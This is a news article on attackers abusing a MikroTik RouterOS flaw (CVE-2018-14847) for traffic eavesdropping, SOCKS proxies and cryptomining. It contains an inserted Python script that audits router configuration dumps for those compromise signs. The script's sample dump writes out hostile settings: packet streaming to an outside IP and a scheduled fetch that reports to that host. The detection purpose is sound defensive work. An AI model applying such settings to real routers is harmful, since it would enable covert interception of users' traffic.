
MikroTik Routers Targeted in Data Eavesdropping Scheme

Researchers: Attackers Continue to Meddle With Hundreds of Thousands of MikroTik Routers

Unknown attackers are intercepting every piece of data handled by more than 7,500 routers made by MikroTik, while also using another 239,000 compromised routers to serve as proxies, according to new research from 360's Network Security Research Lab.


The finding is the latest bad news centering on poorly secured internet of things devices, as attackers have continued to pound routers built by MikroTik. The manufacturer, based in Latvia, issued a patch in April for the vulnerability, designated CVE-2018-14847. But despite warnings from researchers and MikroTik, hundreds of thousands of routers remain unpatched and internet-connected. And attackers have come calling.

The vulnerability in the router can be used to gain access to Winbox, a simple GUI administration utility for MikroTik's RouterOS, as well as to Webfig, the web-based version of the utility. Successfully exploiting the vulnerability gives an attacker complete access to the router. A write-up showing how the vulnerability can be exploited was posted by Alireza Mosajjal of Iran's computer emergency readiness team, BASU CERT.

Packet Forwarding

Attackers often hunt for poorly protected routers because such devices can be used to launch massive distributed denial-of-service attacks or spy on anyone who uses them. For a subset of vulnerable MikroTik router operators, researchers warn that attackers do appear to be recording all web traffic.

MikroTik's advice for mitigating the vulnerability it patched in April

"We ... discovered that more than 7,500 victims are being actively eavesdropped [on], with their traffic being forwarded to IPs controlled by unknown attackers," researchers at 360's Network Security Research Lab write.

In these cases, the researchers note that attackers have been employing a feature built into RouterOS that enables anyone with administrator access to forward all packets to another destination.

Many more of the routers have been turned into proxies using the SOCKS4 internet client/server protocol, the researchers say. About 239,000 IPs attached to MikroTik routers are running a SOCKS4 proxy that has been maliciously activated. If the router is rebooted, "the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker's URL," the researchers write. "It is hard to say what the attacker is up to with this many SOCKS4 proxies but we think this is something significant."
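The packet forwarding, SOCKS proxy and scheduled-task behaviours described above all leave traces in the router's own configuration, so one defensive check is to audit a RouterOS `/export` dump for them. The script below is an added example and is not code from the article or from the 360 researchers; the sample dump is constructed (documentation-range IP 203.0.113.10), and the configuration keys it looks for (`/tool sniffer streaming-enabled`, `/ip socks enabled`, `/system scheduler on-event` calling `/tool fetch`, `/ip proxy enabled`) are standard RouterOS settings rather than values quoted from the page.

```python
import re

# Constructed sample of a RouterOS "/export" dump (not from the article) showing
# the settings the researchers describe on compromised devices.
SAMPLE_EXPORT = """\
/ip socks
set enabled=yes port=4145
/tool sniffer
set streaming-enabled=yes streaming-server=203.0.113.10 filter-ip-protocol=tcp
/system scheduler
add name=upd interval=1h \\
    on-event="/tool fetch url=http://203.0.113.10/report mode=http"
/ip proxy
set enabled=yes
"""

# key=value pairs; quoted values may contain spaces and '=' (e.g. on-event scripts)
KV_RE = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S+)')

def parse_export(text):
    """Return (section, verb, {key: value}) records; joins backslash-wrapped lines."""
    records, section, buf = [], "", ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):          # /export wraps long lines with a backslash
            buf += line[:-1] + " "
            continue
        line, buf = buf + line, ""
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):          # section header such as "/ip socks"
            section = line
            continue
        verb, _, rest = line.partition(" ")
        records.append((section, verb, {k: v.strip('"') for k, v in KV_RE.findall(rest)}))
    return records

def audit(text):
    """Flag the configuration changes the article attributes to the attackers."""
    findings = []
    for section, _verb, kv in parse_export(text):
        if section == "/tool sniffer" and kv.get("streaming-enabled") == "yes":
            findings.append("sniffer streaming to " + kv.get("streaming-server", "?"))
        elif section == "/ip socks" and kv.get("enabled") == "yes":
            findings.append("SOCKS proxy enabled on port " + kv.get("port", "1080"))
        elif section == "/system scheduler" and "/tool fetch" in kv.get("on-event", ""):
            findings.append("scheduler '%s' runs: %s" % (kv.get("name"), kv["on-event"]))
        elif section == "/ip proxy" and kv.get("enabled") == "yes":
            findings.append("web proxy enabled; check its error page and access list")
    return findings
```

Any of these findings on a router that should not be streaming packets, proxying or phoning home is worth treating as a compromise indicator, not just a misconfiguration.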

Monero Mining

By the researchers' count, there are 370,000 MikroTik routers in the wild that have the CVE-2018-14847 flaw and are thus still vulnerable to being easily compromised.

"We strictly followed the Winbox communication protocol to make sure those devices are indeed MikroTik routers, and to verify if the device has been hacked and what the hacked box is [doing]," the researchers write.

Most of the affected routers are in Russia and Brazil, they say. Other countries with notable numbers of hacked routers include Indonesia, India, Iran, Italy, Poland, the United States, Thailand and Ukraine.

This isn't the first time that researchers have warned that MikroTik routers are being compromised by attackers (see Hacked MikroTik Routers Serve Cryptocurrency-Mining Malware).

In early August, multiple researchers warned that they'd found 209,000 MikroTik routers that had been remotely modified with code that mines for the virtual currency known as Monero. The routers were seeded with either Coinhive or Crypto-Loot, both of which are small JavaScript mining programs.

If someone visits a web page that has either program embedded, their computer can be forced to begin mining for the virtual currency. The JavaScript programs generate random hashes, which are then used to complete a "block," referring to a batch of transactions on a blockchain.

Victims are usually unaware that their PC has been pressed into service via this type of cryptomining attack, although it does cause CPUs to work harder and consumes extra electricity.

The researchers, reviewing the attack campaign, note that attackers attempted to redirect all HTTP proxy requests on an infected site to an HTTP 403 error page that would inject Coinhive. "By doing this, the attacker hopes to perform web mining for all the proxy traffic on the users' devices," the researchers say.

But it's not clear how successful these attacks might have been. Notably, the external resources needed for mining "are blocked by the proxy ACL [access control lists] set by the attackers themselves," the researchers write.

About the Author

Jeremy Kirk


Executive Editor, Security and Technology, ISMG

Kirk was executive editor for security and technology for Information Security Media Group. Reporting from Sydney, Australia, he created "The Ransomware Files" podcast, which tells the harrowing stories of IT pros who have fought back against ransomware.
